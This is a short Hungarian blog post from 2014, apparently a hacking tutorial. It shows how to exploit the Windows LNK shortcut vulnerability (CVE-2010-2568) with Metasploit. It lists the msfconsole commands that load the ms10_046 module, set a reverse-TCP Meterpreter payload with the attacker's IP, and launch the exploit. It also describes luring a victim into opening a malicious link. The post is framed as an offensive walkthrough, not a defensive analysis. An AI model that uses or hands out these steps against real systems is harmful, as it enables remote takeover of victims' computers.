2014. január 2., csütörtök

CVE-2010-2568 Windows LNK Exploit

Sziasztok! Ma egy szép kis exploitot szeretnék megmutatni nektek. A Windows Shell azon sebezhetőségét fogjuk kihasználni ami önkényes kód futtatást tesz lehetővé nekünk átalakított .LNK vagy .PIF parancsikonokon keresztül. Az alábbi rendszereken van jelen a sebezhetőség(ha nem javították): Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 és SP2, Server 2008 SP2 és R2, és Windows 7.
Az exploitot megtaláljuk a Metasploitban.
Metasploit Letöltés: http://metasploit.com/
A támadás úgy fog kinézni hogy az áldozatnak elküldünk egy linket, amit ha megnyit feltöltődik a gépére a DLL és LNK.
Nézzük meg most gyakorlatban.Nyissuk meg az msfconsole-t. Aztán:


use windows/browser/ms10_046_shortcut_icon_dllloader
Ezután be kell állítani a payloadot vagyis, hogy mit akarunk csinálni ezen az exploiton keresztül.
Én most a meterpreter shell-t fogom használni.
set payload windows/meterpreter/reverse_tcp
A payload-nak meg kell adni hogy hova kapcsolódjon vissza:
set lhost ip címed
Még meg lehet adni bizonyos opciókat pl. hogy milyen host-on hallgatózzon (srvhost) stb. de nekem most így is menni fog.. 
exploit
És ha minden jól megy akkor bent is vagyunk. :)
Csináltam az exploit használatáról egy kis videót is: